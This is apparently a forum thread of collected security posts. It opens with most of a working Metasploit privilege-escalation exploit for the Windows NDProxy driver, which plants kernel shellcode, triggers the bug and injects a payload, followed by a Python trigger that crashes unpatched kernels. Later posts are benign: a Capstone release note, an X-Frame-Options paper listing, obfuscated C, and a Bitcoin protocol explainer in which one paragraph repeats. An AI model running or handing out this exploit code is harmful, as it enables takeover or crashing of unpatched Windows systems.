    when /[2003|.net server]/i
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    vprint_status("Adding the railgun stuff...")
    add_railgun_functions

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    my_target = nil
    if target.name =~ /Automatic/
      print_status("Detecting the target system...")
      os = sysinfo["OS"]
      if os =~ /windows xp.*service pack 3/i
        my_target = targets[1]
        print_status("Running against #{my_target.name}")
      elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
        my_target = targets[2]
        print_status("Running against #{my_target.name}")
      elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
        my_target = targets[2]
        print_status("Running against #{my_target.name}")
      end
    else
      my_target = target
    end

    if my_target.nil?
      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
    end

    print_status("Checking device...")
    handle = open_device("\\\\.\\NDProxy")
    if handle.nil?
      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
    else
      print_good("\\\\.\\NDProxy found!")
    end

    print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
    else
      print_good("Addresses successfully disclosed.")
    end

    print_status("Storing the kernel stager on memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode(my_target)
    kernel_shell_address = 0x1000
    result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    else
      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
    end

    print_status("Storing the trampoline to the kernel stager on memory...")
    trampoline = "\x90" * 0x38 # nops
    trampoline << "\x68" # push opcode
    trampoline << [0x1000].pack("V") # address to push
    trampoline << "\xc3" # ret
    trampoline_addr = 0x1
    result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing trampoline on memory")
    else
      print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
    end

    print_status("Storing the IO Control buffer on memory...")
    buffer = "\x00" * 1024
    buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
    buffer[28, 4] = [0x34].pack("V") # In order to trigger the vulnerable call
    buffer_addr = 0x0d0d0000
    result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
    else
      print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")
    end

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    magic_ioctl = 0x8fff23c8 # Values taken from the exploit in the wild, see references
    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The exploitation wasn't successful")
    end

    p = payload.encoded
    print_good("Exploitation successful! Creating a new process and launching payload...")
    new_pid = create_proc

    if new_pid.nil?
      print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
      return
    end

    print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
    if execute_shellcode(p, nil, new_pid)
      print_good("Enjoy")
    else
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end

Source: http://www.exploit-db.com/exploits/30392/
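Outside of Meterpreter's railgun, the trigger itself is small. A crash-only sketch (my own reconstruction from the buffer layout above, not the module): open \\.\NDProxy and send IOCTL 0x8fff23c8 with the two magic dwords at offsets 20 and 28. On an unpatched XP SP3 / 2003 SP2 box this dereferences the NULL page and bugchecks; it does not elevate privileges by itself.

import struct
from ctypes import windll, create_string_buffer, byref, c_ulong

GENERIC_READ_WRITE = 0xC0000000
OPEN_EXISTING = 3

handle = windll.kernel32.CreateFileA(b"\\\\.\\NDProxy", GENERIC_READ_WRITE,
                                     0, None, OPEN_EXISTING, 0, None)
if handle in (0, -1):
    raise OSError("\\\\.\\NDProxy not found (is Routing and Remote Access running?)")

buf = bytearray(1024)
buf[20:24] = struct.pack("<I", 0x7030125)   # values taken from the module
buf[28:32] = struct.pack("<I", 0x34)
inbuf = create_string_buffer(bytes(buf), len(buf))
returned = c_ulong(0)

windll.kernel32.DeviceIoControl(handle, 0x8FFF23C8, inbuf, len(buf),
                                inbuf, 0x80, byref(returned), None)
windll.kernel32.CloseHandle(handle)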
  15. Capstone 1.0 disassembly framework release!

From: Nguyen Anh Quynh <aquynh () gmail com>
Date: Wed, 18 Dec 2013 12:42:20 +0800

Hi,

We are excited to announce version 1.0 of Capstone, the multi-arch, multi-platform disassembly framework you have been longing for!

Why is this engine unique? Capstone offers some unparalleled features:

- Supports all important hardware architectures: ARM, ARM64 (aka ARMv8), Mips & X86.
- Clean, simple, lightweight, intuitive architecture-neutral API.
- Provides details on disassembled instructions (called "decomposer" by others).
- Provides some semantics of the disassembled instruction, such as the list of implicit registers read & written.
- Implemented in pure C, with bindings for Python, Ruby, OCaml, C#, Java and Go available.
- Native support for Windows & *nix (including MacOSX, Linux and *BSD platforms).
- Thread-safe by design.
- Distributed under the open source BSD license.

For further information, see our website at Capstone - Ultimate disassembly framework.

Being an infant 1.0 release, Capstone might still be buggy or unable to handle many malware tricks yet. But give it a chance and report your findings, so we can fix the issues in the next versions.

Capstone is a very young project: the first line was written just 4 months ago. But we do hope that it will live a long life. Community support is critical for this little open source project!

We would like to show our gratitude to the beta testers for their bug reports & code contributions during the beta phase! Their invaluable help has been tremendous in getting us this far.

We would like to thank the LLVM project, which Capstone is based on. Without the almighty LLVM, Capstone would not exist!

Last but not least, big thanks go to Coseinc for generously sponsoring our project!

Thanks,
Quynh

Source: Full Disclosure: Capstone 1.0 disassembly framework release!
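A taste of the API through the Python binding, one of the bindings the announcement lists; the sample bytes and base address below are my own illustration:

from capstone import Cs, CS_ARCH_X86, CS_MODE_64

CODE = b"\x55\x48\x89\xe5"                # push rbp; mov rbp, rsp

md = Cs(CS_ARCH_X86, CS_MODE_64)
for insn in md.disasm(CODE, 0x1000):      # 0x1000 is an arbitrary base address
    print("0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))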
  16. X-Frame-Options: All about Clickjacking?

"How else do X-Frame-Options protect my website?"

A poem by Frederik Braun (Mozilla) and Mario Heiderich (Cure53)

The X-Frame-Options header is known to be a good countermeasure against those so-called Clickjacking attacks. You know, the kind of attack where some other website loads important parts of your website inside an iframe or even a frameset, makes everything invisible, and overlays your invisible website with attractive-looking links and buttons. But is it really all about Clickjacking? Let us find out!

I. Introduction
II. The Docmode Problem
III. Drag'N'Drop XSS
IV. Copy & Paste XSS
V. Invisible Site-Wide XSS
VI. Cross-Site Scripting & Length Restrictions
VII. JavaScript à la Carte
VIII. Frame Busting
IX. Side Channels & Cross-Origin Leaks
X. Bye bye, CSP
XI. Conclusion

Download: https://frederik-braun.com/xfo-clickjacking.pdf
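For reference, the header itself is a single line in a response. A minimal sketch (Python standard library; the handler and port are my own illustration) of serving a page that refuses to be framed:

from http.server import BaseHTTPRequestHandler, HTTPServer

class NoFramingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("X-Frame-Options", "DENY")   # or "SAMEORIGIN"
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<h1>This page cannot be framed.</h1>")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), NoFramingHandler).serve_forever()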
  17. An Introduction to the Theory of Elliptic Curves

Joseph H. Silverman
Brown University and NTRU Cryptosystems, Inc.

Summer School on Computational Number Theory and Applications to Cryptography
University of Wyoming, June 19 – July 7, 2006

Download: http://www.math.brown.edu/~jhs/Presentations/WyomingEllipticCurve.pdf
  18. Obfuscate C

Art!

char*lie; double time, me= !0XFACE, not; int rested, get, out; main(ly, die) char ly, **die ;{ signed char lotte, dear; (char)lotte--; for(get= !me;; not){ 1 - out & out ;lie;{ char lotte, my= dear, **let= !!me *!not+ ++die; (char*)(lie= "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!"); do {not= *lie++ & 0xF00L* !me; #define love (char*)lie - love 1 *!(not= atoi(let [get -me? (char)lotte- (char)lotte: my- *love - 'I' - *love - 'U' - 'I' - (long) - 4 - 'U' ])- !! (time =out= 'a'));} while( my - dear && 'I'-1l -get- 'a'); break;}} (char)*lie++; (char)*lie++, (char)*lie++; hell:0, (char)*lie; get *out* (short)ly -0-'R'- get- 'a'^rested; do {auto*eroticism, that; puts(*( out - 'c' -('P'-'S') +die+ -2 ));}while(!"you're at it"); for (*((char*)&lotte)^= (char)lotte; (love ly) [(char)++lotte+ !!0xBABE]{ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; } else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -= '4' - ('I'-1l); not; for(get=! get; !out; (char)*lie & 0xD0- !not) return!! (char)lotte;} (char)lotte; do{ not* putchar(lie [out *!not* !!me +(char)lotte]); not; for(;!'a';}while( love (char*)lie);{ register this; switch( (char)lie [(char)lotte] -1 *!out) { char*les, get= 0xFF, my; case' ': *((char*)&lotte) += 15; !not +(char)*lie*'s'; this +1+ not; default: 0xF +(char*)lie;}}} get - !out; if (not--) goto hell; exit( (char)lotte);}

https://www.cise.ufl.edu/~manuel/obfuscate/
  19. Win64? They have to be signed, or you disable PatchGuard.
  20. How the Bitcoin protocol actually works

by Michael Nielsen on December 6, 2013

Many thousands of articles have been written purporting to explain Bitcoin, the online, peer-to-peer currency. Most of those articles give a hand-wavy account of the underlying cryptographic protocol, omitting many details. Even those articles which delve deeper often gloss over crucial points. My aim in this post is to explain the major ideas behind the Bitcoin protocol in a clear, easily comprehensible way. We'll start from first principles, build up to a broad theoretical understanding of how the protocol works, and then dig down into the nitty-gritty, examining the raw data in a Bitcoin transaction.

Understanding the protocol in this detailed way is hard work. It is tempting instead to take Bitcoin as given, and to engage in speculation about how to get rich with Bitcoin, whether Bitcoin is a bubble, whether Bitcoin might one day mean the end of taxation, and so on. That's fun, but severely limits your understanding. Understanding the details of the Bitcoin protocol opens up otherwise inaccessible vistas. In particular, it's the basis for understanding Bitcoin's built-in scripting language, which makes it possible to use Bitcoin to create new types of financial instruments, such as smart contracts. New financial instruments can, in turn, be used to create new markets and to enable new forms of collective human behaviour. Talk about fun!

I'll describe Bitcoin scripting and concepts such as smart contracts in future posts. This post concentrates on explaining the nuts-and-bolts of the Bitcoin protocol. To understand the post, you need to be comfortable with public key cryptography, and with the closely related idea of digital signatures. I'll also assume you're familiar with cryptographic hashing. None of this is especially difficult. The basic ideas can be taught in freshman university mathematics or computer science classes. The ideas are beautiful, so if you're not familiar with them, I recommend taking a few hours to get familiar.

It may seem surprising that Bitcoin's basis is cryptography. Isn't Bitcoin a currency, not a way of sending secret messages? In fact, the problems Bitcoin needs to solve are largely about securing transactions — making sure people can't steal from one another, or impersonate one another, and so on. In the world of atoms we achieve security with devices such as locks, safes, signatures, and bank vaults. In the world of bits we achieve this kind of security with cryptography. And that's why Bitcoin is at heart a cryptographic protocol.

My strategy in the post is to build Bitcoin up in stages. I'll begin by explaining a very simple digital currency, based on ideas that are almost obvious. We'll call that currency Infocoin, to distinguish it from Bitcoin. Of course, our first version of Infocoin will have many deficiencies, and so we'll go through several iterations of Infocoin, with each iteration introducing just one or two simple new ideas. After several such iterations, we'll arrive at the full Bitcoin protocol. We will have reinvented Bitcoin!

This strategy is slower than if I explained the entire Bitcoin protocol in one shot. But while you can understand the mechanics of Bitcoin through such a one-shot explanation, it would be difficult to understand why Bitcoin is designed the way it is. The advantage of the slower iterative explanation is that it gives us a much sharper understanding of each element of Bitcoin.
Finally, I should mention that I'm a relative newcomer to Bitcoin. I've been following it loosely since 2011 (and cryptocurrencies since the late 1990s), but only got seriously into the details of the Bitcoin protocol earlier this year. So I'd certainly appreciate corrections of any misapprehensions on my part. Also in the post I've included a number of "problems for the author" – notes to myself about questions that came up during the writing. You may find these interesting, but you can also skip them entirely without losing track of the main text.

First steps: a signed letter of intent

So how can we design a digital currency? On the face of it, a digital currency sounds impossible. Suppose some person – let's call her Alice – has some digital money which she wants to spend. If Alice can use a string of bits as money, how can we prevent her from using the same bit string over and over, thus minting an infinite supply of money? Or, if we can somehow solve that problem, how can we prevent someone else forging such a string of bits, and using that to steal from Alice? These are just two of the many problems that must be overcome in order to use information as money.

As a first version of Infocoin, let's find a way that Alice can use a string of bits as a (very primitive and incomplete) form of money, in a way that gives her at least some protection against forgery. Suppose Alice wants to give another person, Bob, an infocoin. To do this, Alice writes down the message "I, Alice, am giving Bob one infocoin". She then digitally signs the message using a private cryptographic key, and announces the signed string of bits to the entire world. (By the way, I'm using capitalized "Infocoin" to refer to the protocol and general concept, and lowercase "infocoin" to refer to specific denominations of the currency. A similar usage is common, though not universal, in the Bitcoin world.)

This isn't terribly impressive as a prototype digital currency! But it does have some virtues. Anyone in the world (including Bob) can use Alice's public key to verify that Alice really was the person who signed the message "I, Alice, am giving Bob one infocoin". No-one else could have created that bit string, and so Alice can't turn around and say "No, I didn't mean to give Bob an infocoin". So the protocol establishes that Alice truly intends to give Bob one infocoin. The same fact – no-one else could compose such a signed message – also gives Alice some limited protection from forgery. Of course, after Alice has published her message it's possible for other people to duplicate the message, so in that sense forgery is possible. But it's not possible from scratch. These two properties – establishment of intent on Alice's part, and the limited protection from forgery – are genuinely notable features of this protocol.

I haven't (quite) said exactly what digital money is in this protocol. To make this explicit: it's just the message itself, i.e., the string of bits representing the digitally signed message "I, Alice, am giving Bob one infocoin". Later protocols will be similar, in that all our forms of digital money will be just more and more elaborate messages [1].

Using serial numbers to make coins uniquely identifiable

A problem with the first version of Infocoin is that Alice could keep sending Bob the same signed message over and over. Suppose Bob receives ten copies of the signed message "I, Alice, am giving Bob one infocoin". Does that mean Alice sent Bob ten different infocoins?
Was her message accidentally duplicated? Perhaps she was trying to trick Bob into believing that she had given him ten different infocoins, when the message only proves to the world that she intends to transfer one infocoin.

What we'd like is a way of making infocoins unique. They need a label or serial number. Alice would sign the message "I, Alice, am giving Bob one infocoin, with serial number 8740348". Then, later, Alice could sign the message "I, Alice, am giving Bob one infocoin, with serial number 8770431", and Bob (and everyone else) would know that a different infocoin was being transferred.

To make this scheme work we need a trusted source of serial numbers for the infocoins. One way to create such a source is to introduce a bank. This bank would provide serial numbers for infocoins, keep track of who has which infocoins, and verify that transactions really are legitimate.

In more detail, let's suppose Alice goes into the bank, and says "I want to withdraw one infocoin from my account". The bank reduces her account balance by one infocoin, and assigns her a new, never-before used serial number, let's say 1234567. Then, when Alice wants to transfer her infocoin to Bob, she signs the message "I, Alice, am giving Bob one infocoin, with serial number 1234567". But Bob doesn't just accept the infocoin. Instead, he contacts the bank, and verifies that: (a) the infocoin with that serial number belongs to Alice; and (b) Alice hasn't already spent the infocoin. If both those things are true, then Bob tells the bank he wants to accept the infocoin, and the bank updates their records to show that the infocoin with that serial number is now in Bob's possession, and no longer belongs to Alice.

Making everyone collectively the bank

This last solution looks pretty promising. However, it turns out that we can do something much more ambitious. We can eliminate the bank entirely from the protocol. This changes the nature of the currency considerably. It means that there is no longer any single organization in charge of the currency. And when you think about the enormous power a central bank has – control over the money supply – that's a pretty huge change.

The idea is to make it so everyone (collectively) is the bank. In particular, we'll assume that everyone using Infocoin keeps a complete record of which infocoins belong to which person. You can think of this as a shared public ledger showing all Infocoin transactions. We'll call this ledger the block chain, since that's what the complete record will be called in Bitcoin, once we get to it.

Now, suppose Alice wants to transfer an infocoin to Bob. She signs the message "I, Alice, am giving Bob one infocoin, with serial number 1234567", and gives the signed message to Bob. Bob can use his copy of the block chain to check that, indeed, the infocoin is Alice's to give. If that checks out then he broadcasts both Alice's message and his acceptance of the transaction to the entire network, and everyone updates their copy of the block chain.

We still have the "where do serial numbers come from" problem, but that turns out to be pretty easy to solve, and so I will defer it to later, in the discussion of Bitcoin. A more challenging problem is that this protocol allows Alice to cheat by double spending her infocoin. She sends the signed message "I, Alice, am giving Bob one infocoin, with serial number 1234567" to Bob, and the message "I, Alice, am giving Charlie one infocoin, with [the same] serial number 1234567" to Charlie.
We still have the "where do serial numbers come from" problem, but that turns out to be pretty easy to solve, and so I will defer it to later, in the discussion of Bitcoin. A more challenging problem is that this protocol allows Alice to cheat by double spending her infocoin. She sends the signed message "I, Alice, am giving Bob one infocoin, with serial number 1234567" to Bob, and the message "I, Alice, am giving Charlie one infocoin, with [the same] serial number 1234567" to Charlie.

Both Bob and Charlie use their copy of the block chain to verify that the infocoin is Alice's to spend. Provided they do this verification at nearly the same time (before they've had a chance to hear from one another), both will find that, yes, the block chain shows the coin belongs to Alice. And so they will both accept the transaction, and also broadcast their acceptance of the transaction. Now there's a problem. How should other people update their block chains? There may be no easy way to achieve a consistent shared ledger of transactions. And even if everyone can agree on a consistent way to update their block chains, there is still the problem that either Bob or Charlie will be cheated.

At first glance double spending seems difficult for Alice to pull off. After all, if Alice sends the message first to Bob, then Bob can verify the message, and tell everyone else in the network (including Charlie) to update their block chain. Once that has happened, Charlie would no longer be fooled by Alice. So there is most likely only a brief period of time in which Alice can double spend. However, it's obviously undesirable to have any such period of time. Worse, there are techniques Alice could use to make that period longer. She could, for example, use network traffic analysis to find times when Bob and Charlie are likely to have a lot of latency in communication. Or perhaps she could do something to deliberately disrupt their communications. If she can slow communication even a little, that makes her task of double spending much easier.

How can we address the problem of double spending? The obvious solution is that when Alice sends Bob an infocoin, Bob shouldn't try to verify the transaction alone. Rather, he should broadcast the possible transaction to the entire network of Infocoin users, and ask them to help determine whether the transaction is legitimate. If they collectively decide that the transaction is okay, then Bob can accept the infocoin, and everyone will update their block chain. This type of protocol can help prevent double spending, since if Alice tries to spend her infocoin with both Bob and Charlie, other people on the network will notice, and network users will tell both Bob and Charlie that there is a problem with the transaction, and the transaction shouldn't go through.

In more detail, let's suppose Alice wants to give Bob an infocoin. As before, she signs the message "I, Alice, am giving Bob one infocoin, with serial number 1234567", and gives the signed message to Bob. Also as before, Bob does a sanity check, using his copy of the block chain to check that, indeed, the coin currently belongs to Alice. But at that point the protocol is modified. Bob doesn't just go ahead and accept the transaction. Instead, he broadcasts Alice's message to the entire network. Other members of the network check to see whether Alice owns that infocoin. If so, they broadcast the message "Yes, Alice owns infocoin 1234567, it can now be transferred to Bob." Once enough people have broadcast that message, everyone updates their block chain to show that infocoin 1234567 now belongs to Bob, and the transaction is complete.

This protocol has many imprecise elements at present. For instance, what does it mean to say "once enough people have broadcast that message"? What exactly does "enough" mean here? It can't mean everyone in the network, since we don't a priori know who is on the Infocoin network. For the same reason, it can't mean some fixed fraction of users in the network.
We won't try to make these ideas precise right now. Instead, in the next section I'll point out a serious problem with the approach as described. Fixing that problem will at the same time have the pleasant side effect of making the ideas above much more precise.

Proof-of-work

Suppose Alice wants to double spend in the network-based protocol I just described. She could do this by taking over the Infocoin network. Let's suppose she uses an automated system to set up a large number of separate identities, let's say a billion, on the Infocoin network. As before, she tries to double spend the same infocoin with both Bob and Charlie. But when Bob and Charlie ask the network to validate their respective transactions, Alice's sock puppet identities swamp the network, announcing to Bob that they've validated his transaction, and to Charlie that they've validated his transaction, possibly fooling one or both into accepting the transaction.

There's a clever way of avoiding this problem, using an idea known as proof-of-work. The idea is counterintuitive and involves a combination of two ideas: (1) to (artificially) make it computationally costly for network users to validate transactions; and (2) to reward them for trying to help validate transactions. The reward is used so that people on the network will try to help validate transactions, even though that's now been made a computationally costly process. The benefit of making it costly to validate transactions is that validation can no longer be influenced by the number of network identities someone controls, but only by the total computational power they can bring to bear on validation. As we'll see, with some clever design we can make it so a cheater would need enormous computational resources to cheat, making it impractical.

That's the gist of proof-of-work. But to really understand proof-of-work, we need to go through the details. Suppose Alice broadcasts to the network the news that "I, Alice, am giving Bob one infocoin, with serial number 1234567". As other people on the network hear that message, each adds it to a queue of pending transactions that they've been told about, but which haven't yet been approved by the network. For instance, another network user named David might have the following queue of pending transactions:

I, Tom, am giving Sue one infocoin, with serial number 1201174.
I, Sydney, am giving Cynthia one infocoin, with serial number 1295618.
I, Alice, am giving Bob one infocoin, with serial number 1234567.

David checks his copy of the block chain, and can see that each transaction is valid. He would like to help out by broadcasting news of that validity to the entire network. However, before doing that, as part of the validation protocol David is required to solve a hard computational puzzle – the proof-of-work. Without the solution to that puzzle, the rest of the network won't accept his validation of the transaction.

What puzzle does David need to solve? To explain that, let h be a fixed hash function known by everyone in the network – it's built into the protocol. Bitcoin uses the well-known SHA-256 hash function, but any cryptographically secure hash function will do. Let's give David's queue of pending transactions a label, l, just so it's got a name we can refer to. Suppose David appends a number x (called the nonce) to l and hashes the combination.
For example, if we use "Hello, world!" (obviously this is not a list of transactions, just a string used for illustrative purposes) and the nonce x = 0, then (output is in hexadecimal)

h("Hello, world!0") = 1312af178c253f84028d480a6adc1e25e81caa44c749ec81976192e2ec934c64

The puzzle David has to solve – the proof-of-work – is to find a nonce x such that when we append x to l and hash the combination the output hash begins with a long run of zeroes. The puzzle can be made more or less difficult by varying the number of zeroes required to solve the puzzle. A relatively simple proof-of-work puzzle might require just three or four zeroes at the start of the hash, while a more difficult proof-of-work puzzle might require a much longer run of zeros, say 15 consecutive zeroes. In either case, the above attempt to find a suitable nonce, with x = 0, is a failure, since the output doesn't begin with any zeroes at all. Trying x = 1 doesn't work either:

h("Hello, world!1") = e9afc424b79e4f6ab42d99c81156d3a17228d6e1eef4139be78e948a9332a7d8

We can keep trying different values for the nonce. Finally, at x = 4250 we obtain:

h("Hello, world!4250") = 0000c3af42fc31103f1fdc0151fa747ff87349a4714df7cc52ea464e12dcd4e9

This nonce gives us a string of four zeroes at the beginning of the output of the hash. This will be enough to solve a simple proof-of-work puzzle, but not enough to solve a more difficult proof-of-work puzzle. What makes this puzzle hard to solve is the fact that the output from a cryptographic hash function behaves like a random number: change the input even a tiny bit and the output from the hash function changes completely, in a way that's hard to predict. So if we want the output hash value to begin with 10 zeroes, say, then David will need, on average, to try 16^10 ≈ 10^12 different values for x before he finds a suitable nonce. That's a pretty challenging task, requiring lots of computational power.

Obviously, it's possible to make this puzzle more or less difficult to solve by requiring more or fewer zeroes in the output from the hash function. In fact, the Bitcoin protocol gets quite a fine level of control over the difficulty of the puzzle, by using a slight variation on the proof-of-work puzzle described above. Instead of requiring leading zeroes, the Bitcoin proof-of-work puzzle requires the hash of a block's header to be lower than or equal to a number known as the target. This target is automatically adjusted to ensure that a Bitcoin block takes, on average, about ten minutes to validate.

(In practice there is a sizeable randomness in how long it takes to validate a block – sometimes a new block is validated in just a minute or two, other times it may take 20 minutes or even longer. It's straightforward to modify the Bitcoin protocol so that the time to validation is much more sharply peaked around ten minutes. Instead of solving a single puzzle, we can require that multiple puzzles be solved; with some careful design it is possible to considerably reduce the variance in the time to validate a block of transactions.)

Alright, let's suppose David is lucky and finds a suitable nonce, x. Celebration! (He'll be rewarded for finding the nonce, as described below.) He broadcasts the block of transactions he's approving to the network, together with the value for x. Other participants in the Infocoin network can verify that x is a valid solution to the proof-of-work puzzle. And they then update their block chains to include the new block of transactions.
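The "Hello, world!" search above is easy to reproduce yourself. Here is a short Python sketch of the brute-force loop; the difficulty parameter (the number of required leading zeroes) is the only knob:

import hashlib

def find_nonce(message, difficulty):
    # Try x = 0, 1, 2, ... until sha256(message + x) starts with enough zeroes.
    x = 0
    while True:
        digest = hashlib.sha256((message + str(x)).encode()).hexdigest()
        if digest.startswith("0" * difficulty):
            return x, digest
        x += 1

print(find_nonce("Hello, world!", 4))  # should find x = 4250, matching the example above

Each additional required hex zero multiplies the expected work by 16, which is how the difficulty of the puzzle can be tuned.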
For the proof-of-work idea to have any chance of succeeding, network users need an incentive to help validate transactions. Without such an incentive, they have no reason to expend valuable computational power, merely to help validate other people's transactions. And if network users are not willing to expend that power, then the whole system won't work. The solution to this problem is to reward people who help validate transactions. In particular, suppose we reward whoever successfully validates a block of transactions by crediting them with some infocoins. Provided the infocoin reward is large enough, that will give them an incentive to participate in validation.

In the Bitcoin protocol, this validation process is called mining. For each block of transactions validated, the successful miner receives a bitcoin reward. Initially, this was set to be a 50 bitcoin reward. But for every 210,000 validated blocks (roughly, once every four years) the reward halves. This has happened just once, to date, and so the current reward for mining a block is 25 bitcoins. This halving in the rate will continue every four years until the year 2140 CE. At that point, the reward for mining will drop below 10^-8 bitcoins per block. 10^-8 bitcoins is actually the minimal unit of Bitcoin, and is known as a satoshi. So in 2140 CE the total supply of bitcoins will cease to increase. However, that won't eliminate the incentive to help validate transactions. Bitcoin also makes it possible to set aside some currency in a transaction as a transaction fee, which goes to the miner who helps validate it. In the early days of Bitcoin transaction fees were mostly set to zero, but as Bitcoin has gained in popularity, transaction fees have gradually risen, and are now a substantial additional incentive on top of the 25 bitcoin reward for mining a block.

You can think of proof-of-work as a competition to approve transactions. Each entry in the competition costs a little bit of computing power. A miner's chance of winning the competition is (roughly, and with some caveats) equal to the proportion of the total computing power that they control. So, for instance, if a miner controls one percent of the computing power being used to validate Bitcoin transactions, then they have roughly a one percent chance of winning the competition. So provided a lot of computing power is being brought to bear on the competition, a dishonest miner is likely to have only a relatively small chance to corrupt the validation process, unless they expend a huge amount of computing resources.

Of course, while it's encouraging that a dishonest party has only a relatively small chance to corrupt the block chain, that's not enough to give us confidence in the currency. In particular, we haven't yet conclusively addressed the issue of double spending. I'll analyse double spending shortly. Before doing that, I want to fill in an important detail in the description of Infocoin. We'd ideally like the Infocoin network to agree upon the order in which transactions have occurred. If we don't have such an ordering then at any given moment it may not be clear who owns which infocoins. To help do this we'll require that new blocks always include a pointer to the last block validated in the chain, in addition to the list of transactions in the block. (The pointer is actually just a hash of the previous block.)
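As a sketch of what that pointer looks like, here is a toy Python block structure. The fields are invented for illustration; real Bitcoin blocks contain considerably more:

import hashlib, json

def block_hash(block):
    # Hash a canonical serialization of the block.
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

genesis = {"prev": None, "transactions": ["initial money supply"]}
block1 = {"prev": block_hash(genesis), "transactions": ["Alice -> Bob, coin 1234567"]}
block2 = {"prev": block_hash(block1), "transactions": ["Bob -> Charlie, coin 1234567"]}

Because each block commits to the hash of its predecessor, tampering with any old block changes its hash and silently breaks every later pointer in the chain.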
So typically the block chain is just a linear chain of blocks of transactions, one after the other, with later blocks each containing a pointer to the immediately prior block.

Occasionally, a fork will appear in the block chain. This can happen, for instance, if by chance two miners happen to validate a block of transactions near-simultaneously – both broadcast their newly-validated block out to the network, and some people update their block chain one way, and others update their block chain the other way. This causes exactly the problem we're trying to avoid – it's no longer clear in what order transactions have occurred, and it may not be clear who owns which infocoins.

Fortunately, there's a simple idea that can be used to remove any forks. The rule is this: if a fork occurs, people on the network keep track of both forks. But at any given time, miners only work to extend whichever fork is longest in their copy of the block chain. Suppose, for example, that we have a fork in which some miners receive block A first, and some miners receive block B first. Those miners who receive block A first will continue mining along that fork, while the others will mine along fork B. Let's suppose that the miners working on fork B are the next to successfully mine a block. After they receive news that this has happened, the miners working on fork A will notice that fork B is now longer, and will switch to working on that fork. Presto, in short order work on fork A will cease, and everyone will be working on the same linear chain, and block A can be ignored. Of course, any still-pending transactions in A will still be pending in the queues of the miners working on fork B, and so all transactions will eventually be validated. Likewise, it may be that the miners working on fork A are the first to extend their fork. In that case work on fork B will quickly cease, and again we have a single linear chain. No matter what the outcome, this process ensures that the block chain has an agreed-upon time ordering of the blocks.

In Bitcoin proper, a transaction is not considered confirmed until: (1) it is part of a block in the longest fork, and (2) at least 5 blocks follow it in the longest fork. In this case we say that the transaction has "6 confirmations". This gives the network time to come to an agreed-upon ordering of the blocks. We'll also use this strategy for Infocoin.
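Here is a minimal Python sketch of the fork rule, reusing the toy block layout from the earlier sketch (again, my own simplification, not the real Bitcoin data structures):

def chain_length(blocks, tip):
    # `blocks` maps each block's hash to the block itself.
    # Walk the prev-pointers from a fork's tip back to the genesis block.
    length = 0
    while tip is not None:
        length += 1
        tip = blocks[tip]["prev"]
    return length

def preferred_tip(blocks, tips):
    # A miner extends whichever competing fork is longest in its own copy.
    return max(tips, key=lambda t: chain_length(blocks, t))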
With the time-ordering now understood, let's return to think about what happens if a dishonest party tries to double spend. Suppose Alice tries to double spend with Bob and Charlie. One possible approach is for her to try to validate a block that includes both transactions. Assuming she has one percent of the computing power, she will occasionally get lucky and validate the block by solving the proof-of-work. Unfortunately for Alice, the double spending will be immediately spotted by other people in the Infocoin network and rejected, despite solving the proof-of-work problem. So that's not something we need to worry about.

A more serious problem occurs if she broadcasts two separate transactions in which she spends the same infocoin with Bob and Charlie, respectively. She might, for example, broadcast one transaction to a subset of the miners, and the other transaction to another set of miners, hoping to get both transactions validated in this way. Fortunately, in this case, as we've seen, the network will eventually confirm one of these transactions, but not both. So, for instance, Bob's transaction might ultimately be confirmed, in which case Bob can go ahead confidently. Meanwhile, Charlie will see that his transaction has not been confirmed, and so will decline Alice's offer. So this isn't a problem either. In fact, knowing that this will be the case, there is little reason for Alice to try this in the first place.

